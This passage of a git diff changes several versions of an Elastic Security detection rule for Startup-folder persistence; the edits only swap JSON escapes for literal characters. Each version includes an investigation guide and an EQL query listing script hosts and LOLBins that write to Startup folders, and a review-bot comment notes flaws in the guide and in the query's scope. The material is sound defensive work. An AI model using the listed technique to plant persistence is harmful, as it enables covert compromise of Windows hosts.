!{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators may add programs to this mechanism via command-line shells. 
Before the further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Startup Persistence by a Suspicious Process\n\nThe Windows Startup folder is a special folder in Windows. 
Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule monitors for commonly abused processes writing to the Startup folder locations.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - 
!{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators may add programs to this mechanism via command-line shells. 
Before the further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n user.domain != \"NT AUTHORITY\" and\n file.path : (\"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp\\\\*\") and\n process.name : (\"cmd.exe\",\n \"powershell.exe\",\n \"wmic.exe\",\n \"mshta.exe\",\n \"pwsh.exe\",\n \"cscript.exe\",\n \"wscript.exe\",\n \"regsvr32.exe\",\n \"RegAsm.exe\",\n \"rundll32.exe\",\n \"EQNEDT32.EXE\",\n \"WINWORD.EXE\",\n \"EXCEL.EXE\",\n \"POWERPNT.EXE\",\n \"MSPUB.EXE\",\n \"MSACCESS.EXE\",\n \"iexplore.exe\",\n \"InstallUtil.exe\")\n",
 "references": [
 "https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-1"
@@ -58,7 +58,7 @@
 ],
 "risk_score": 47,
 "rule_id": "440e2db4-bc7f-4c96-a068-65b78da59bde",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -71,7 +71,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_106.json b/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_106.json
index 8602cf217f0..4460c870a8c 100644
--- a/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_106.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Startup Persistence by a Suspicious Process", - "note": "## Triage and analysis\n\n### Investigating Startup Persistence by a Suspicious Process\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule monitors for commonly abused processes writing to the Startup folder locations.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - 
!{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators may add programs to this mechanism via command-line shells. 
Before the further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Startup Persistence by a Suspicious Process\n\nThe Windows Startup folder is a special folder in Windows. 
Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule monitors for commonly abused processes writing to the Startup folder locations.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - 
!{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators may add programs to this mechanism via command-line shells. 
Before the further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n user.domain != \"NT AUTHORITY\" and\n file.path : (\"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp\\\\*\") and\n process.name : (\"cmd.exe\",\n \"powershell.exe\",\n \"wmic.exe\",\n \"mshta.exe\",\n \"pwsh.exe\",\n \"cscript.exe\",\n \"wscript.exe\",\n \"regsvr32.exe\",\n \"RegAsm.exe\",\n \"rundll32.exe\",\n \"EQNEDT32.EXE\",\n \"WINWORD.EXE\",\n \"EXCEL.EXE\",\n \"POWERPNT.EXE\",\n \"MSPUB.EXE\",\n \"MSACCESS.EXE\",\n \"iexplore.exe\",\n \"InstallUtil.exe\")\n",
 "references": [
 "https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-1"
@@ -58,7 +58,7 @@
 ],
 "risk_score": 47,
 "rule_id": "440e2db4-bc7f-4c96-a068-65b78da59bde",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_107.json b/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_107.json
index 820bc3f03cb..99eed6961ae 100644
--- a/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_107.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Startup Persistence by a Suspicious Process", - "note": "## Triage and analysis\n\n### Investigating Startup Persistence by a Suspicious Process\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule monitors for commonly abused processes writing to the Startup folder locations.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - 
!{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators may add programs to this mechanism via command-line shells. 
Before the further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Startup Persistence by a Suspicious Process\n\nThe Windows Startup folder is a special folder in Windows. 
Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule monitors for commonly abused processes writing to the Startup folder locations.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - 
!{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators may add programs to this mechanism via command-line shells. 
Before the further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n user.domain != \"NT AUTHORITY\" and\n file.path : (\"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp\\\\*\") and\n process.name : (\"cmd.exe\",\n \"powershell.exe\",\n \"wmic.exe\",\n \"mshta.exe\",\n \"pwsh.exe\",\n \"cscript.exe\",\n \"wscript.exe\",\n \"regsvr32.exe\",\n \"RegAsm.exe\",\n \"rundll32.exe\",\n \"EQNEDT32.EXE\",\n \"WINWORD.EXE\",\n \"EXCEL.EXE\",\n \"POWERPNT.EXE\",\n \"MSPUB.EXE\",\n \"MSACCESS.EXE\",\n \"iexplore.exe\",\n \"InstallUtil.exe\")\n",
 "references": [
 "https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-1"
@@ -58,7 +58,7 @@
 ],
 "risk_score": 47,
 "rule_id": "440e2db4-bc7f-4c96-a068-65b78da59bde",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
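Review bot: The investigation guide on the new `+ "note"` line tells analysts to search for 4624 logons "to the target host after the registry modification", but this rule triggers on a file write into the Startup folder, not on a registry change, so the step points analysts at the wrong artifact; it should read `... to the target host after the file was written to the Startup folder.` In the same guide, the "Retrieve Services Running on User Accounts" osquery filters with `user_account == null`, which in SQLite evaluates to NULL for every row and, as far as I can tell, makes the whole `NOT (...)` predicate NULL so that no rows are ever returned; `user_account IS NULL` expresses the intent and keeps the rest of the filter working. Separately, the unchanged `user.domain != "NT AUTHORITY"` clause in the query drops every SYSTEM-context writer, so a cmd.exe or powershell.exe running as SYSTEM that drops a file into the all-users `ProgramData\...\StartUp` path is silently out of scope; if that exclusion exists to suppress installer noise, a comment stating so, or narrowing it to the per-user path only, would make the trade-off visible to tuners. This commit only normalizes the `\u003e`/`\u003c`/`\u0026` escapes, so the guide text itself is carried over unchanged from the prior version.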
@@ -71,7 +71,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_108.json b/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_108.json
index 572285bbc08..b223d3303ab 100644
--- a/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_108.json
